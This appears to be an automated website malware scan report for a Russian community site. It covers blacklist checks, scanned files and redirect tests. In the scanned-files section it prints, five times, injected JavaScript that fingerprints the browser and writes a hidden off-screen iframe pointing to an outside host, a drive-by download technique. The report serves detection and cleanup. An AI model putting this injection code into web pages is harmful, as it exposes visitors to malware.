Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brateckrolik.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brateckrolik.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://brateckrolik.ru/ | 200 OK Content-Length: 34763 Content-Type: text/html | clean |
http://brateckrolik.ru/includes/jquery/jquery.js | 200 OK Content-Length: 597 Content-Type: application/javascript | clean |
http://brateckrolik.ru/core/js/common.js | 200 OK Content-Length: 894 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas(); function reloadCaptcha(img_id){ $("img#"+img_id).attr("src", "/includes/codegen/cms_codegen.php?"+Math.random()); } function centerLink(href){ $.post(href, {'of_ajax': 1}, function(data){ $('div.component').html(data); }); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/modules/mod_latest/js/latest.js | 200 OK Content-Length: 852 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas(); function conPage(page, module_id){ $.post('/modules/mod_latest/ajax/latest.php', {'module_id': module_id, 'page':page}, function(data){ $('div#module_ajax_'+module_id).html(data); }); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/registration | 200 OK Content-Length: 19686 Content-Type: text/html | clean |
http://brateckrolik.ru/components/registration/js/check.js | 200 OK Content-Length: 1638 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( } } } } function checkPasswords(){ var pass1 = $("#pass1input").attr('value'); var pass2 = $("#pass2input").attr('value'); if (pass1 == pass2) { $('#passcheck').html('<span style="color:green">Ïàðîëè ñîâïàäàþò</span>'); } else { $('#passcheck').html('<span style="color:red">Ïàðîëè íå ñîâïàäàþò!</span>'); } };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/login | 200 OK Content-Length: 12424 Content-Type: text/html | clean |
http://brateckrolik.ru/photos | 200 OK Content-Length: 12995 Content-Type: text/html | clean |
http://brateckrolik.ru/photos/latest.html | 200 OK Content-Length: 32638 Content-Type: text/html | clean |
http://brateckrolik.ru/photos/top.html | 200 OK Content-Length: 32959 Content-Type: text/html | clean |
http://brateckrolik.ru/blogs | 200 OK Content-Length: 60978 Content-Type: text/html | clean |
http://brateckrolik.ru/includes/jquery/jquery.jcorners.js | 200 OK Content-Length: 2872 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( intval: function(v) { v = parseInt(v); return isNaN(v) ? 0 : v; }, guid: function(){ var result, i, j; result = ''; for(j=0; j<32; j++) { if( j == 8 || j == 12|| j == 16|| j == 20) result = result + '-'; i = Math.floor(Math.random()*16).toString(16).toUpperCase(); result = result + i; } return result } }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/includes/jquery/syntax/src/shCore.js | 200 OK Content-Length: 597 Content-Type: application/javascript | clean |
http://brateckrolik.ru/includes/jquery/syntax/scripts/shBrushPhp.js | 200 OK Content-Length: 6383 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( this.forHtmlScript(SyntaxHighlighter.regexLib.phpScriptTags); }; SyntaxHighlighter.brushes.Php.prototype = new SyntaxHighlighter.Highlighter(); SyntaxHighlighter.brushes.Php.aliases = ['php']; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/clubs | 200 OK Content-Length: 16435 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brateckrolik.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 15 Aug 2014 02:26:19 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 34763
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=70dafe197f71ab98d5377e91eb6f8131; path=/
X-Powered-By: PHP/5.2.17
...34763 bytes of data.
GET / HTTP/1.1
Host: brateckrolik.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 15 Aug 2014 02:26:19 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 34763
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=70dafe197f71ab98d5377e91eb6f8131; path=/
X-Powered-By: PHP/5.2.17
...34763 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: brateckrolik.ru
Referer: http://www.google.com/search?q=brateckrolik.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brateckrolik.ru
Referer: http://www.google.com/search?q=brateckrolik.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.